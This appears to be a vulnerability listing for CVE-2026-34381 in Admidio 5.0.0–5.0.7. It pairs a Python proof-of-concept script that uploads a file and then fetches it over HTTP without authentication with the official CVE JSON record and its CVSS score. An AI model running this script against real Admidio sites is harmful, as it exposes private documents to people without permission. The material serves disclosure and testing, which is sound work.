CVE-2026-34381

import requests import json # Target URL (Example) target_url = "http://target-admidio-domain.com" login_url = f"{target_url}/adm_program/modules/documents/documents_upload.php" # Attacker's file files = {'userfile': ('exploit_test.txt', 'Sensitive Content', 'text/plain')} # Step 1: Upload the file to get the path # Note: Depending on config, authentication might be needed for upload, but file access is the issue. # Assuming upload endpoint is reachable or we have a low-priv user. session = requests.Session() response = session.post(login_url, files=files) if response.status_code == 200: try: data = response.json() # Extract file path from JSON response file_path = data.get('file_path') # Hypothetical key based on description print(f"[+] File uploaded. Path disclosed: {file_path}") # Step 2: Access the file directly without authentication # The vulnerability states .htaccess is ignored, so direct access works. direct_access_url = f"{target_url}/{file_path}" print(f"[*] Attempting direct access: {direct_access_url}") file_response = requests.get(direct_access_url) if file_response.status_code == 200: print("[!] Vulnerability Confirmed! File content downloaded:") print(file_response.text) else: print("[-] Failed to access file directly.") except json.JSONDecodeError: print("[-] Could not parse JSON response.") else: print(f"[-] Upload failed with status code: {response.status_code}")

{"cve": {"id": "CVE-2026-34381", "sourceIdentifier": "[email protected]", "published": "2026-03-31T21:16:30.013", "lastModified": "2026-04-01T18:24:07.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Admidio is an open-source user management solution. From version 5.0.0 to before version 5.0.8, Admidio relies on adm_my_files/.htaccess to deny direct HTTP access to uploaded documents. The Docker image ships with AllowOverride None in the Apache configuration, which causes Apache to silently ignore all .htaccess files. As a result, any file uploaded to the documents module regardless of the role-based permissions configured in the UI, is directly accessible over HTTP without authentication by anyone who knows the file path. The file path is disclosed in the upload response JSON. This issue has been patched in version 5.0.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.8", "matchCriteriaId": "57D165DA-4B63-4140-9E3E-B66F1A9CE955"}]}]}], "references": [{"url": "https://github.com/Admidio/admidio/commit/5f770c1ca81a4f6b02136280cd63316a35aabaaf", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-7fh7-8xqm-3g88", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-7fh7-8xqm-3g88", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}